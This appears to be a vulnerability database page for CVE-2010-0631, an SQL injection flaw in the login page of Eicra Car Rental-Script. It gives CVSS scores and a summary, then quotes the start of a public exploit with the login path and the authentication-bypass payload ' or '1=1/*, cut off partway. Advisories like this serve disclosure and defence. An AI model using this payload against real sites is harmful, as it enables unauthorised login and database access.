7.5
CVSSv2

CVE-2010-0631

Published: 12/02/2010 Updated: 15/02/2010
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Multiple SQL injection vulnerabilities in index.php in Eicra Car Rental-Script, when the plugin_id parameter is 4, allow remote malicious users to execute arbitrary SQL commands via the (1) users (username) and (2) passwords parameters.

Vulnerable Product Search on Vulmon Subscribe to Product

eicrasoft eicra car rental-script

Exploits

/* Name : PHP Car Rental-Script (Auth Bypass) SQL Injection WebSite : wwwcarrentalphpscriptcom/ Author : Hamza 'MizoZ' N Email : mizozx@gmailcom Greetz : Zuka , Achille Dark3r , int_0x80 , geekseccom<geekseccom> */ - Log-On page : server/[PATH]/indexphp?plugin_id=4 username = ' or '1=1/* password = ' or ...